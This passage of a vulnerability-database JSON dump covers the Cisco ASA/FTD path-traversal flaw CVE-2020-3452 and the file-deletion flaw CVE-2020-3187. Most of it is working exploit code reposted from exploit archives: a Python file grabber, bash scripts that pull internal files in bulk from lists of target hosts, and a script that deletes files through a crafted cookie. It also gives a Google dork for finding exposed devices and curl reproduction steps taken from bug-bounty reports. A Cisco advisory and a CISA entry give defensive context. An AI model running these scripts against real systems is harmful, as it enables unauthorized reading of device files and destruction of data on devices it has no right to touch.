verify=False) \n# write the file to the disk \nf = open(file,\"w\") \nf.write(response.text) \nf.close() \n \n \n \n# this is a list of files available to download, more will be added in time \n# if anyone has a list of ASA files, I'd be happy to add here \nfiles = { \n\"sess_update.html\", \n\"blank.html\", \n\"noportal.html\", \n\"portal_ce.html\", \n\"portal.html\", \n\"logon_custom.css\", \n\"svc.html\", \n\"logo.gif\", \n\"portal_inc.lua\", \n\"nostcaccess.html\", \n\"session.js\", \n\"portal.js\", \n\"portal_custom.css\", \n\"running.conf\", \n\"tlbrportal_forms.js\", \n\"logon_forms.js\", \n\"win.js\", \n\"portal.css\", \n\"lced.html\", \n\"pluginlib.js\", \n\"useralert.html\", \n\"ping.html\", \n\"app_index.html\", \n\"shshimdo_url\", \n\"session_password.html\", \n\"relayjar.html\", \n\"relayocx.html\", \n\"color_picker.js\", \n\"color_picker.html\", \n\"cedhelp.html\", \n\"cedmain.html\", \n\"cedlogon.html\", \n\"cedportal.html\", \n\"portal_elements.html\", \n\"commonspawn.js\", \n\"common.js\", \n\"appstart.js\", \n\"relaymonjar.html\", \n\"relaymonocx.html\", \n\"cedsave.html\", \n\"tunnel_linux.jnlp\", \n\"ask.html\", \n\"no_svc.html\", \n\"preview.html\", \n\"cedf.html\", \n\"ced.html\", \n\"logon_redirect.html\", \n\"logout.html\", \n\"tunnel_mac.jnlp\", \n\"gp-gip.html\", \n\"auth.html\", \n\"wrong_url.html\", \n\"logon.html\"} \n \n \n# obvious thing is obvious, try the things and barf if fail \ntry: \ngrabstuff() \nexcept Exception as err: \nprint(\"Something went wrong sorry\") \nprint(err) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/160497/ciscoasaftd-traversal.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-10-12T19:02:07", "description": "", "cvss3": {}, "published": "2020-10-11T00:00:00", "type": "packetstorm", "title": "Cisco ASA / FTD 9.6.4.42 Path Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3452"], "modified": "2020-10-11T00:00:00", "id": "PACKETSTORM:159523", "href": "https://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html", "sourceData": "`# Exploit Title: Cisco ASA and FTD 9.6.4.42 - Path Traversal \n# Date: 2020-10-10 \n# Exploit Author: 3ndG4me \n# Vendor: www.cisco.com \n# Product: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html \n# CVE : CVE-2020-3452 \n \n \n \nTARGET=$1 \nCISCO_KNOWN_FILES=\"logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonjar.html relaymonocx.html relayjar.html relayocx.html portal_img color_picker.js color_picker.html cedhelp.html cedmain.html cedlogon.html cedportal.html cedsave.html cedf.html ced.html lced.html files 041235123432C2 041235123432U2 pluginlib.js shshim do_url clear_cache connection_failed_form apcf ucte_forbidden_data ucte_forbidden_url cookie session_password.html tunnel_linux.jnlp tunnel_mac.jnlp sdesktop gp-gip.html auth.html wrong_url.html logon_redirect.html logout.html logon.html test_chargen\" \nmkdir cisco_asa_files \n \nif [ -z \"$1\" ]; \nthen \necho \"Usage: cve-2020-3452.sh <target ip/hostname>\" \necho \"Example: cve-2020-3452.sh mytarget.com\" \necho \"Files that are downloaded will be in the newly created 'cisco_asa_files' directory\" \necho \"Target not specificed...exiting...\" \nelse \nfor FILE in $CISCO_KNOWN_FILES; \ndo \ncurl \"https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../\" | tee cisco_asa_files/$FILE; \ndone \nfi \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/159523/ciscoasaftd96442-traversal.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-08-01T01:16:14", "description": "", "cvss3": {}, "published": "2020-07-29T00:00:00", "type": "packetstorm", "title": "Cisco Adaptive Security Appliance Software 9.7 Arbitrary File Deletion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3452", "CVE-2020-3187"], "modified": "2020-07-29T00:00:00", "id": "PACKETSTORM:158648", "href": "https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html", "sourceData": "`# Exploit Title: Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion \n# Google Dork: inurl:/+CSCOE+/ \n# Date: 2020-08-27 \n# Exploit Author: 0xmmnbassel \n# Vendor Homepage: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html#~models \n# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60 \n# Vulnerability Type: unauthenticated file deletion \n# Version: Cisco ASA Software releases 9.5 and earlier, as well as \n# Release 9.7, have reached end of software maintenance. Customers are \n# advised to migrate to a supported release that includes the fix for \n# this vulnerability. \n# CVE : CVE-2020-3187 \n \n#!/bin/bash \n \ndelete=\"csco_logo.gif\" \n \n \nhelpFunction() \n{ \necho \"\" \necho -e \"\\t\\tCVE-2020-3187\" \necho \"\" \necho \"Usage: $0 -l targets.txt -d csco_logo.gif \" \necho -e \"\\t-l for list of IPs in text file\" \necho -e \"\\t-d file to be deleted, default: ./+CSCOE+/csco_logo.gif\" \necho -e \"\\t-i for single IP test\" \nexit 1 \n} \n \nwhile getopts \"l:d:i:\" opt \ndo \ncase \"$opt\" in \nl ) input=\"$OPTARG\" ;; \nd ) delete=\"$OPTARG\" ;; \ni ) website=\"$OPTARG\" ;; \n? ) helpFunction ;; \nesac \ndone \n \n \n#if $website is empty or $input is empty \nif [ -z \"$website\" ] && [ -z \"$input\" ] \nthen \necho \"Some/all of the parameters are empty\"; \nhelpFunction \nfi \n \n#usage \n \nif [ -z \"$input\"]; \nthen \nstatus=$(curl -LI $website/+CSCOU+/$delete -o /dev/null -w \n'%{http_code}\\n' -s) \necho \"checking if $website has the $delete file\" \nif [ $status -eq 200 ]; then \necho \"$website/+CSCOU+/$delete exists, deleting it...\" \ncurl -H \"Cookie: token=..//+CSCOU+/$delete\" -v -s -o \nresultsindv.txt $website/+CSCOE+/session_password.html \ndelcheck=$(curl -LI $website/+CSCOU+/$delete -o /dev/null -w \n'%{http_code}\\n' -s) \nif [ delcheck -eq 404]; then \necho \"Deleted!, $website is vulnerable to CVE-2020-3187.\" \nelse \necho \"Cannot Delete $website/+CSCOU+/$delete file, check it manaully!\" \nfi \nelse \necho \"$website/+CSCOU+/$delete doesn't exist!\" \nfi \n \nelse \nwhile IFS= read -r line \ndo \necho \"Checking $line if file $delete exist..\" \n#echo $response \nstatus=$(curl -LI $line/+CSCOU+/$delete -o /dev/null -w \n'%{http_code}\\n' -s) \nif [ $status -eq 200 ]; then \necho \"$line/+CSCOU+/$delete exists, deleting it...\" \ncurl -H \"Cookie: token=..//+CSCOU+/$delete\" -v -s -o \nresults.txt $line/+CSCOE+/session_password.html \n \n#for no verbosity \n#curl -H \"Cookie: token=..//+CSCOU+/$delete\" -s -o \nresults.txt $line/+CSCOE+/session_password.html \ndelcheck=$(curl -LI $line/+CSCOU+/$delete -o /dev/null -w \n'%{http_code}\\n' -s) \nif [ delcheck -eq 404]; then \necho \"Deleted!, $line is vulnerable to CVE-2020-3187.\" \nelse \necho \"Cannot Delete $line/+CSCOU+/$delete file, check it manaully!\" \nfi \nelse \necho \"$line/+CSCOU+/$delete doesn't exist!\" \nfi \ndone < \"$input\" \n \n \nfi \n \n \n \n \n#!/bin/bash \n \n \nread=\"%2bCSCOE%2b/portal_inc.lua\" \n \n \nhelpFunction() \n{ \necho \"\" \necho -e \"\\t\\tCVE-2020-3452\" \necho \"\" \necho \"Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua \" \necho -e \"\\t-l for list of IPs in text file\" \necho -e \"\\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua\" \necho -e \"\\t-i for single IP test\" \nexit 1 \n} \n \nwhile getopts \"l:r:i:\" opt \ndo \ncase \"$opt\" in \nl ) input=\"$OPTARG\" ;; \nr ) read=\"$OPTARG\" ;; \ni ) website=\"$OPTARG\" ;; \n? ) helpFunction ;; \nesac \ndone \n \n \n \n#if $website is empty or $input is empty \nif [ -z \"$website\" ] && [ -z \"$input\" ] \nthen \necho \"Some/all of the parameters are empty\"; \nhelpFunction \nfi \n \n#usage \n \n \nif [ -z \"$website\"]; \nthen \nwhile IFS= read -r line \ndo \nname=$(echo $line | cut -c9-19) \n#echo \"testing $line\" \nfilename=\"$name.txt\" \n#echo $response \nstatus=$(curl -LI $line\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s) \n \nif [ $status -eq \"400\" ]; then \necho \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\" \nelse \nwget \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt \n \nif [ -s $filename ]; then \necho \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\" \necho \"downloaded!, $line is vulnerable to CVE-2020-3452.\" \n \nelse \necho \"not vulnerable!\" \nrm -rf $filename \nfi \nfi \ndone < \"$input\" \nelse \n \nname=$(echo $website | cut -c9-16) \nfilename=\"$name.txt\" \n \nstatus=$(curl -LI $website\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s) \nif [ $status -eq \"Bad Request\" ]; then \necho \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\" \nelse \n \necho \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\" \nwget \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt \nif [ -s $filename ]; then \necho \"downloaded!, $website is vulnerable to CVE-2020-3452.\" \nelse \necho \"not vulnerable!\" \nrm -rf $filename \nfi \nfi \n \nfi \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158648/ciscoasa97-filedelete.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2020-07-29T17:58:42", "description": "Exploit for hardware platform in category web applications", "cvss3": {}, "published": "2020-07-29T00:00:00", "type": "zdt", "title": "Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3452"], "modified": "2020-07-29T00:00:00", "id": "1337DAY-ID-34760", "href": "https://0day.today/exploit/description/34760", "sourceData": "# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion\r\n# Google Dork: inurl:/+CSCOE+/\r\n# Date: 2020-08-27\r\n# Exploit Author: 0xmmnbassel\r\n# Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\r\n# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60\r\n# Vulnerability Type: unauthenticated file read\r\n# CVE: CVE-2020-3452\r\n\r\n\r\n#!/bin/bash\r\n\r\n\r\nread=\"%2bCSCOE%2b/portal_inc.lua\"\r\n\r\n\r\nhelpFunction()\r\n{\r\n echo \"\"\r\n echo -e \"\\t\\tCVE-2020-3452\"\r\n echo \"\"\r\n echo \"Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua \"\r\n echo -e \"\\t-l for list of IPs in text file\"\r\n echo -e \"\\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua\"\r\n echo -e \"\\t-i for single IP test\"\r\n exit 1\r\n}\r\n\r\nwhile getopts \"l:r:i:\" opt\r\ndo\r\n case \"$opt\" in\r\n l ) input=\"$OPTARG\" ;;\r\n r ) read=\"$OPTARG\" ;;\r\n i ) website=\"$OPTARG\" ;;\r\n ? ) helpFunction ;;\r\n esac\r\ndone\r\n\r\n\r\n\r\n#if $website is empty or $input is empty\r\nif [ -z \"$website\" ] && [ -z \"$input\" ]\r\nthen\r\n echo \"Some/all of the parameters are empty\";\r\n helpFunction\r\nfi\r\n\r\n#usage\r\n\r\n\r\nif [ -z \"$website\"];\r\n then\r\n while IFS= read -r line\r\n do\r\n name=$(echo $line | cut -c9-19)\r\n #echo \"testing $line\"\r\n filename=\"$name.txt\"\r\n #echo $response\r\n status=$(curl -LI $line\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s)\r\n\r\n if [ $status -eq \"400\" ]; then\r\n echo \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\"\r\n else\r\n wget \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt\r\n\r\n if [ -s $filename ]; then\r\n echo \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\"\r\n echo \"downloaded!, $line is vulnerable to CVE-2020-3452.\"\r\n\r\n else\r\n echo \"not vulnerable!\"\r\n rm -rf $filename\r\n fi\r\n fi\r\n done < \"$input\"\r\n else\r\n\r\n name=$(echo $website | cut -c9-16)\r\n filename=\"$name.txt\"\r\n\r\n status=$(curl -LI $website\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s)\r\n if [ $status -eq \"Bad Request\" ]; then\r\n echo \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\"\r\n else\r\n\r\n echo \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\"\r\n wget \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt\r\n if [ -s $filename ]; then\r\n echo \"downloaded!, $website is vulnerable to CVE-2020-3452.\"\r\n else\r\n echo \"not vulnerable!\"\r\n rm -rf $filename\r\n fi\r\n fi\r\n\r\nfi\n\n# 0day.today [2020-07-29] #", "sourceHref": "https://0day.today/exploit/34760", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cisco": [{"lastseen": "2022-12-22T12:17:41", "description": "A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system.\n\nThe vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user.\n\nThe web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files, underlying operating system (OS) files, or VPN user login credentials.\n\nCisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.\n\nNote: Cisco has become aware of the availability of public exploit code and active exploitation of the vulnerability that is described in this advisory. Cisco encourages customers with affected products to upgrade to a fixed release as soon as possible.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\"]", "cvss3": {}, "published": "2020-07-22T16:00:00", "type": "cisco", "title": "Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Read-Only Path Traversal Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-3452"], "modified": "2020-08-27T14:33:49", "id": "CISCO-SA-ASAFTD-RO-PATH-KJUQHB86", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86", "cvss": {"score": 7.5, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Cisco Adaptive Security Appliance and Cisco Fire Power Threat Defense directory traversal sensitive file read", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-3452", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "hackerone": [{"lastseen": "2023-02-03T01:39:42", "bounty": 0.0, "description": "**Summary:**\nAccording to Cisco:\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system.\n\nThe vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device.\n\nThe web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\nAn advisory can be found at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Step-by-step Reproduction Instructions\n\n1. In bash, use `curl -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\"` to prove you can read internal files such as the /+CSCOE+/portal_inc.lua file.\n2. Various internal files can be read, and some require using the --output command to output the binary data to a file as shown below:\n\n```\ncurl -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session.js&default-language&lang=../\" --output session.js\n```\n\n## Suggested Mitigation/Remediation Actions\nUpdate the software to the latest version via the Cisco advisory linked above.\n\n## Impact\n\nA successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device.\n\nThe web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-23T02:16:08", "type": "hackerone", "title": "U.S. Dept Of Defense: Path traversal on https://\u2588\u2588\u2588 allows arbitrary file read (CVE-2020-3452)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-08-13T18:09:37", "id": "H1:936399", "href": "https://hackerone.com/reports/936399", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T01:39:42", "bounty": 0.0, "description": "**Summary:**\nhttps://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 is vulnerable to a [Read-Only Path Traversal Vulnerability](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86)\n\n**Description:**\nGet request parameters at the `/+CSCOT+/translation-table` and the `/+CSCOT+/oem-customization` are not properly sanitized which allows for reading files within the webroot directory that are not intended to be readable.\n\n## Impact\nAn unauthenticated, remote attacker can read sensitive files located inside the webroot directory. \n\n## Step-by-step Reproduction Instructions\n### Using Browser\n1. Visit https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ in browser and note that you are prompted for a file download. This will be the source code for `portal_inc.lua` which is not normally accessible.\n2. To verify you cannot access this file normally, visit https://\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOE+/portal_inc.lua and verify that you receive a page that says \"Wrong URL\".\n\n### Using Curl\n1. In a linux terminal, send the following `curl` command:\n\n```\ncurl -i -s -k -X $'GET' \\\n -H $'Host: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \\\n $'https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'\n``` \n\nand\n\n```\ncurl -i -s -k -X $'GET' \\\n -H $'Host: \u2588\u2588\u2588\u2588' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \\\n $'https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua'\n```\nYou should receive the following output:\n\n```\nHTTP/1.1 200 OK\nContent-Type: application/octet-stream\nTransfer-Encoding: chunked\nCache-Control: no-cache\nPragma: no-cache\nConnection: Keep-Alive\nDate: Fri, 24 Jul 2020 04:27:46 GMT\nX-Frame-Options: SAMEORIGIN\nStrict-Transport-Security: max-age=31536000; includeSubDomains\n\n-- Copyright (C) 2006-2018 by Cisco Systems, Inc.\n-- Created by otrizna@cisco.com\n\ndofile(\"/+CSCOE+/include/common.lua\")\ndofile(\"/+CSCOE+/include/browser_inc.lua\")\n\nlocal function compare(a,b) return a[\"order\"]<b[\"order\"] end;\n\nfunction INTERNAL_PASSWORD_ENABLED(name)\n return false;\n```\n2. To verify you should not be able to access this info, run the following `curl` command:\n\n```\ncurl -i -s -k -X $'GET' \\\n -H $'Host: \u2588\u2588\u2588\u2588\u2588' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \\\n $'https://\u2588\u2588\u2588/%2bCSCOE%2b/portal_inc.lua'\n```\n\nYou should receive the following output:\n\n```\nHTTP/1.1 500 Internal Error\nCache-Control: no-cache\nPragma: no-cache\nConnection: Close\nDate: Fri, 24 Jul 2020 04:28:13 GMT\nX-Frame-Options: SAMEORIGIN\nStrict-Transport-Security: max-age=31536000; includeSubDomains\n```\n\n## Screenshots in Burpsuite showing the requests succeeding and failing\n\n### Success at https://\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ which results in disclosure of the source code in `portal_inc.lua`\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n### Failure trying to access https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOE+/portal_inc.lua\n\u2588\u2588\u2588\n\n## Suggested Mitigation/Remediation Actions\nUpgrade to the latest version of Cisco ASA or Cisco FTD.\n\n## References\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\nhttps://twitter.com/aboul3la/status/1286012324722155525\n\n## Impact\n\nCVSS Score: Base 7.5\nVector: [CVSS:3.1/CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MPR:X/MUI:X/MS:X/MC:X/MI:X/MA:X](https://tools.cisco.com/security/center/cvssCalculator.x?version=3.1&vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\nAn unauthenticated, remote attacker can read sensitive files located inside the webroot directory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-24T05:12:21", "type": "hackerone", "title": "U.S. Dept Of Defense: https://\u2588\u2588\u2588\u2588\u2588 is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-08-13T18:08:40", "id": "H1:940384", "href": "https://hackerone.com/reports/940384", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T01:39:16", "bounty": 0.0, "description": "**Summary:**\n#_The affected IP_:\n\u2588\u2588\u2588\u2588\u2588\n\nHere is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.\nFor example to read \"/+CSCOE+/portal_inc.lua\" file.\n\nfor example:\n\n\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n\n## Suggested Mitigation/Remediation Actions\n\nCisco has released the fix https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nThis vulnerability allows an 